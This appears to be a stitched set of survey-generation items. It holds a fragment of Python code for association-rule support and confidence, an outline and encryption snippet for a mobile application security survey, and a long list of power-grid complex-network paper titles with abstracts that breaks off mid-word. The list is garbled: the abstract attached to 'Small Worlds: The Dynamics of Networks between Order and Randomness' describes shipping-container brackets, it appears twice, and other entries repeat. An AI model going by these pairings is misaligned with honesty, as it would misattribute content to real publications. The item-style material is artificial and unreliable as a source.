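    return sum(s <= t for t in transactions) / len(transactions)

def confidence(transactions, antecedent, consequent):
    """Confidence of the rule antecedent -> consequent."""
    both = support(transactions, set(antecedent) | set(consequent))
    return both / support(transactions, antecedent)

transactions = [{"syn_flood", "port_scan"}, {"syn_flood"},
                {"port_scan", "root_shell"}, {"syn_flood", "port_scan"}]
print(support(transactions, {"syn_flood", "port_scan"}))       # 0.5
print(confidence(transactions, {"syn_flood"}, {"port_scan"}))  # ~0.67
```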
Mobile Application Security Platforms Survey
9
---
<format>
Title: Mobile Application Security Platforms Survey
Section 1: Introduction
Description 1: Introduce the significance of mobile application security and provide background information on the current landscape of mobile security platforms.
Section 2: Mobile Security Threats
Description 2: Detail various security threats faced by mobile applications, including malware, phishing, data breaches, and other vulnerabilities.
Section 3: Security Measures and Best Practices
Description 3: Discuss prevalent security measures and best practices used to protect mobile applications from threats, including encryption, multi-factor authentication, and code obfuscation.
Section 4: Security Platforms for Mobile Applications
Description 4: Examine different security platforms and solutions available for mobile application security, highlighting key features and functionalities.
Section 5: Comparison of Security Platforms
Description 5: Provide a comparative analysis of different mobile security platforms, evaluating their strengths and weaknesses.
Section 6: Case Studies
Description 6: Present case studies of organizations or applications that have successfully implemented mobile security platforms, demonstrating real-world applications and outcomes.
Section 7: Challenges and Limitations
Description 7: Identify and discuss the challenges and limitations in the current mobile application security landscape, including technical, regulatory, and user-related issues.
Section 8: Future Trends in Mobile Security
Description 8: Explore emerging trends and future directions in mobile application security, such as advancements in AI-based security solutions and zero trust architectures.
Section 9: Conclusion
Description 9: Summarize the key findings from the survey, emphasize the importance of mobile application security, and suggest potential areas for future research and development.
</format>
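Section 3 above lists encryption among the baseline protections. Purely as an illustration of encrypting a locally stored value (the library choice is ours, and a real app would obtain the key from the platform keystore, such as the Android Keystore or iOS Keychain, rather than generating it in place):

```python
# pip install cryptography
from cryptography.fernet import Fernet

key = Fernet.generate_key()                  # in practice: fetched from the platform keystore
f = Fernet(key)

token = f.encrypt(b"auth_session=abc123")    # ciphertext safe to persist on the device
print(f.decrypt(token))                      # b'auth_session=abc123'
```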
The Power Grid as a Complex Network: a Survey
11
--- paper_title: Emergence of scaling in random networks paper_content: Systems as diverse as genetic networks or the World Wide Web are best described as networks with complex topology. A common property of many large networks is that the vertex connectivities follow a scale-free power-law distribution. This feature was found to be a consequence of two generic mechanisms: (i) networks expand continuously by the addition of new vertices, and (ii) new vertices attach preferentially to sites that are already well connected. A model based on these two ingredients reproduces the observed stationary scale-free distributions, which indicates that the development of large networks is governed by robust self-organizing phenomena that go beyond the particulars of the individual systems. --- paper_title: Predictability and epidemic pathways in global outbreaks of infectious diseases: the SARS case study paper_content: BackgroundThe global spread of the severe acute respiratory syndrome (SARS) epidemic has clearly shown the importance of considering the long-range transportation networks in the understanding of emerging diseases outbreaks. The introduction of extensive transportation data sets is therefore an important step in order to develop epidemic models endowed with realism.MethodsWe develop a general stochastic meta-population model that incorporates actual travel and census data among 3 100 urban areas in 220 countries. The model allows probabilistic predictions on the likelihood of country outbreaks and their magnitude. The level of predictability offered by the model can be quantitatively analyzed and related to the appearance of robust epidemic pathways that represent the most probable routes for the spread of the disease.ResultsIn order to assess the predictive power of the model, the case study of the global spread of SARS is considered. The disease parameter values and initial conditions used in the model are evaluated from empirical data for Hong Kong. The outbreak likelihood for specific countries is evaluated along with the emerging epidemic pathways. Simulation results are in agreement with the empirical data of the SARS worldwide epidemic.ConclusionThe presented computational approach shows that the integration of long-range mobility and demographic data provides epidemic models with a predictive power that can be consistently tested and theoretically motivated. This computational strategy can be therefore considered as a general tool in the analysis and forecast of the global spreading of emerging diseases and in the definition of containment policies aimed at reducing the effects of potentially catastrophic outbreaks. --- paper_title: Analysis of the Nordel power grid disturbance of January 1, 1997 using trajectory sensitivities paper_content: This paper uses trajectory sensitivity analysis to investigate a major disturbance of the Nordel power system which occurred on January 1, 1997. The Nordel system is described, and the details of the disturbance are presented. Background to trajectory sensitivity analysis is also provided. Results of the investigation indicate the usefulness of trajectory sensitivities for exploring the influence of various system parameters on the large disturbance behaviour of the system. The trajectory sensitivities provide a way of judging the relative importance of various factors which affected behaviour. 
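Most of the references that follow characterize a grid by the same handful of topological measures: node-degree distribution, characteristic path length, clustering coefficient, and centrality. A minimal sketch of computing them, on a toy graph rather than real grid data and using networkx purely as an example tool:

```python
# pip install networkx
import networkx as nx

# Toy stand-in for a transmission grid: buses as nodes, lines as edges.
G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 4), (4, 0), (0, 2), (2, 5), (5, 6)])

degrees = dict(G.degree())                 # node-degree distribution
L = nx.average_shortest_path_length(G)     # characteristic path length
C = nx.average_clustering(G)               # clustering coefficient
B = nx.betweenness_centrality(G)           # topological importance of each bus

print(degrees)
print(round(L, 2), round(C, 2), max(B, key=B.get))

# Scale-free benchmark in the spirit of the first reference above.
BA = nx.barabasi_albert_graph(50, 2)
```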
--- paper_title: Network Topology of a Potential Energy Landscape: A Static Scale-Free Network paper_content: Here we analyze the topology of the network formed by the minima and transition states on the potential energy landscape of small clusters. We find that this network has both a small-world and scale-free character. In contrast to other scale-free networks, where the topology results from the dynamics of the network growth, the potential energy landscape is a static entity. Therefore, a fundamentally different organizing principle underlies this behavior: The potential energy landscape is highly heterogeneous with the low-energy minima having large basins of attraction and acting as the highly connected hubs in the network. --- paper_title: Prediction and predictability of global epidemics: the role of the airline transportation network paper_content: The systematic study of large-scale networks has unveiled the ubiquitous presence of connectivity patterns characterized by large scale heterogeneities and unbounded statistical fluctuations. These features affect dramatically the behavior of the diffusion processes occurring on networks, determining the ensuing statistical properties of their evolution pattern and dynamics. In this paper, we investigate the role of the large scale properties of the airline transportation network in determining the global evolution of emerging disease. We present a stochastic computational framework for the forecast of global epidemics that considers the complete world-wide air travel infrastructure complemented with census population data. We address two basic issues in global epidemic modeling: i) We study the role of the large scale properties of the airline transportation network in determining the global diffusion pattern of emerging diseases; ii) We evaluate the reliability of forecasts and outbreak scenarios with respect to the intrinsic stochasticity of disease transmission and traffic flows. In order to address these issues we define a set of novel quantitative measures able to characterize the level of heterogeneity and predictability of the epidemic pattern. These measures may be used for the analysis of containment policies and epidemic risk assessment. --- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Directed-graph epidemiological models of computer viruses paper_content: The strong analogy between biological viruses and their computational counterparts has motivated the authors to adapt the techniques of mathematical epidemiology to the study of computer virus propagation. 
In order to allow for the most general patterns of program sharing, a standard epidemiological model is extended by placing it on a directed graph and a combination of analysis and simulation is used to study its behavior. The conditions under which epidemics are likely to occur are determined, and, in cases where they do, the dynamics of the expected number of infected individuals are examined as a function of time. It is concluded that an imperfect defense against computer viruses can still be highly effective in preventing their widespread proliferation, provided that the infection rate does not exceed a well-defined critical epidemic threshold. > --- paper_title: On power-law relationships of the Internet topology paper_content: Despite the apparent randomness of the Internet, we discover some surprisingly simple power-laws of the Internet topology. These power-laws hold for three snapshots of the Internet, between November 1997 and December 1998, despite a 45% growth of its size during that period. We show that our power-laws fit the real data very well resulting in correlation coefficients of 96% or higher.Our observations provide a novel perspective of the structure of the Internet. The power-laws describe concisely skewed distributions of graph properties such as the node outdegree. In addition, these power-laws can be used to estimate important parameters such as the average neighborhood size, and facilitate the design and the performance analysis of protocols. Furthermore, we can use them to generate and select realistic topologies for simulation purposes. --- paper_title: Error and Attack Tolerance of Complex Networks paper_content: Communication/transportation systems are often subjected to failures and attacks. Here we represent such systems as networks and we study their ability to resist failures (attacks) simulated as the breakdown of a group of nodes of the network chosen at random (chosen accordingly to degree or load). We consider and compare the results for two different network topologies: the Erdos–Renyi random graph and the Barabasi–Albert scale-free network. We also discuss briefly a dynamical model recently proposed to take into account the dynamical redistribution of loads after the initial damage of a single node of the network. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. 
Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Modeling blackout dynamics in power transmission networks with simple structure paper_content: A model for blackouts in electric power transmission systems is implemented and studied in simple networks with a regular structure. The model describes load demand and network improvements evolving on a slow timescale as well as the fast dynamics of cascading overloads and outages. The model dynamics are demonstrated on the simple power system networks. The dynamics depend weakly on the network topologies tested. The probability distribution functions of measures of the cascading events show the existence of power-dependent tails. --- paper_title: Exploring complex networks paper_content: The study of networks pervades all of science, from neurobiology to statistical physics. The most basic issues are structural: how does one characterize the wiring diagram of a food web or the Internet or the metabolic network of the bacterium Escherichia coli? Are there any unifying principles underlying their topology? From the perspective of nonlinear dynamics, we would also like to understand how an enormous network of interacting dynamical systems — be they neurons, power stations or lasers — will behave collectively, given their individual dynamics and coupling architecture. Researchers are only now beginning to unravel the structure and dynamics of complex networks. --- paper_title: Network topology of the interbank market paper_content: We provide an empirical analysis of the network structure of the Austrian interbank market based on Austrian Central Bank (OeNB) data. The interbank market is interpreted as a network where banks are nodes and the claims and liabilities between banks define the links. This allows us to apply methods from general network theory. We find that the degree distributions of the interbank network follow power laws. Given this result we discuss how the network structure affects the stability of the banking system with respect to the elimination of a node in the network, i.e. the default of a single bank. Further, the interbank liability network shows a community structure that exactly mirrors the regional and sectoral organization of the current Austrian banking system. The banking network has the typical structural features found in numerous other complex real-world networks: a low clustering coefficient and a short average path length. These empirical findings are in marked contrast to the network structures that have been assumed thus far in the theoretical economic and econo-physics literature. --- paper_title: The large-scale organization of metabolic networks paper_content: In a cell or microorganism, the processes that generate mass, energy, information transfer and cell-fate specification are seamlessly integrated through a complex network of cellular constituents and reactions1. However, despite the key role of these networks in sustaining cellular functions, their large-scale structure is essentially unknown. Here we present a systematic comparative mathematical analysis of the metabolic networks of 43 organisms representing all three domains of life. 
We show that, despite significant variation in their individual constituents and pathways, these metabolic networks have the same topological scaling properties and show striking similarities to the inherent organization of complex non-biological systems2. This may indicate that metabolic organization is not only identical for all living organisms, but also complies with the design principles of robust and error-tolerant scale-free networks2,3,4,5, and may represent a common blueprint for the large-scale organization of interactions among all cellular constituents. --- paper_title: Is the Boston Subway a Small-World Network? paper_content: The mathematical study of the small-world concept has fostered quite some interest, showing that small-world features can be identified for some abstract classes of networks. However, passing to real complex systems, as for instance transportation networks, shows a number of new problems that make current analysis impossible. In this paper we show how a more refined kind of analysis, relying on transportation efficiency, can in fact be used to overcome such problems, and to give precious insights on the general characteristics of real transportation networks, eventually providing a picture where the small-world comes back as underlying construction principle. --- paper_title: Global disease spread: statistics and estimation of arrival times paper_content: We study metapopulation models for the spread of epidemics in which different subpopulations (cities) are connected by fluxes of individuals (travelers). This framework allows one to describe the spread of a disease on a large scale and we focus here on the computation of the arrival time of a disease as a function of the properties of the seed of the epidemics and of the characteristics of the network connecting the various subpopulations. Using analytical and numerical arguments, we introduce an easily computable quantity which approximates this average arrival time. We show on the example of a disease spread on the world-wide airport network that this quantity predicts with a good accuracy the order of arrival of the disease in the various subpopulations in each realization of epidemic scenario, and not only for an average over realizations. Finally, this quantity might be useful in the identification of the dominant paths of the disease spread. --- paper_title: Stochastic Model for Power Grid Dynamics paper_content: We introduce a stochastic model that describes the quasi-static dynamics of an electric transmission network under perturbations introduced by random load fluctuations, random removing of system components from service, random repair times for the failed components, and random response times to implement optimal system corrections for removing line overloads in a damaged or stressed transmission network. We use a linear approximation to the network flow equations and apply linear programming techniques that optimize the dispatching of generators and loads in order to eliminate the network overloads associated with a damaged system. We also provide a simple model for the operator's response to various contingency events that is not always optimal due to either failure of the state estimation system or due to the incorrect subjective assessment of the severity associated with these events. This further allows us to use a game theoretic framework for casting the optimization of the operator's response into the choice of the optimal strategy which minimizes the operating cost. 
We use a simple strategy space which is the degree of tolerance to line overloads and which is an automatic control (optimization) parameter that can be adjusted to trade off automatic load shed without propagating cascades versus reduced load shed and an increased risk of propagating cascades. The tolerance parameter is chosen to describes a smooth transition from a risk averse to a risk taken strategy. We present numerical results comparing the responses of two power grid systems to optimization approaches with different factors of risk and select the best blackout controlling parameter --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Error and Attack Tolerance of Complex Networks paper_content: Communication/transportation systems are often subjected to failures and attacks. Here we represent such systems as networks and we study their ability to resist failures (attacks) simulated as the breakdown of a group of nodes of the network chosen at random (chosen accordingly to degree or load). We consider and compare the results for two different network topologies: the Erdos–Renyi random graph and the Barabasi–Albert scale-free network. We also discuss briefly a dynamical model recently proposed to take into account the dynamical redistribution of loads after the initial damage of a single node of the network. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. 
Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: The very small world of the well-connected paper_content: Online networks occupy an increasingly larger position in how we acquire information, how we communicate with one another, and how we disseminate information. Frequently, small sets of vertices dominate various graph and statistical properties of these networks and, because of this, they are relevant for structural analysis and efficient algorithms and engineering. For the web overall, and specifically for social linking in blogs and instant messaging, we provide a principled, rigorous study of the properties, the construction, and the utilization of subsets of special vertices in large online networks. We show that graph synopses defined by the importance of vertices provide small, relatively accurate portraits, independent of the importance measure, of the larger underlying graphs and of the important vertices. Furthermore, they can be computed relatively efficiently. --- paper_title: Topology of technology graphs: small world patterns in electronic circuits. paper_content: Recent theoretical studies and extensive data analyses have revealed a common feature displayed by biological, social, and technological networks: the presence of small world patterns. Here we analyze this problem by using several graphs obtained from one of the most common technological systems: electronic circuits. It is shown that both analogic and digital circuits exhibit small world behavior. We conjecture that the small world pattern arises from the compact design in which many elements share a small, close physical neighborhood plus the fact that the system must define a single connected component (which requires shortcuts connecting different integrated clusters). The degree distributions displayed are consistent with a conjecture concerning the sharp cutoffs associated to the presence of costly connections [Amaral et al., Proc. Natl. Acad. Sci. USA 97, 11 149 (2000)], thus providing a limit case for the classes of universality of small world patterns from real, artificial networks. The consequences for circuit design are outlined. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. 
The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be L_j = [k_j (Σ_{m∈C_j} k_m)]^a, with k_j and C_j being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0.7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case of a ≥ 0.7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation.
The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Critical node identification of smart power system using complex network framework based centrality approach paper_content: A method of critical node identification in a power system is presented in this paper. Maximum flow in a network is used to measure centrality of various nodes in the power system. The proposed approach is an improvement of previous methodology in the sense that it does not take into consideration shortest electrical distance as path to flow power. Instead of using normal steady-state condition maximum possible flow is considered. Simulation of various standard test systems are carried out to identify critical nodes. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. 
Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. 
Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. 
We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. 
More power is transmitted along lines with lower reactance on the way from the source node to the destination node, which gives the edges with lower reactance a higher weight in the analysis. The analyses have been carried out on the IEEE 39 bus system and the IEEE 118 bus system. The new betweenness index can identify the critical lines of the system, either due to their position in the network or due to the power they transmit along the network. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several EU countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful for vulnerability assessment and for designing specific actions to reduce topological weaknesses. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, small-world theory from complex network research is employed to probe the mechanism behind them. In the paper, the original small-world network model has been modified in two ways. Firstly, the magnitude of the line impedance, regarded as the edge weight, is taken into consideration, which is not the case in the original model. The formulae of the corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model. Secondly, the complex number format of power flow is introduced as the network flow in the small-world model. With the power flow and the topology of grids, the two main factors in system vulnerability, both considered, the improved small-world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, the cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems.
In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL 